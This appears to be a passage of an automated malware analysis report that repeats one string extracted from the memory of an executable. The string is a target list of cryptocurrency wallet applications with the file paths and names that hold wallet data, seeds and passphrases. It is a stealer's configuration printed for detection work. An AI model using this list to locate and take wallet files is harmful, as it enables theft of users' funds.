Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
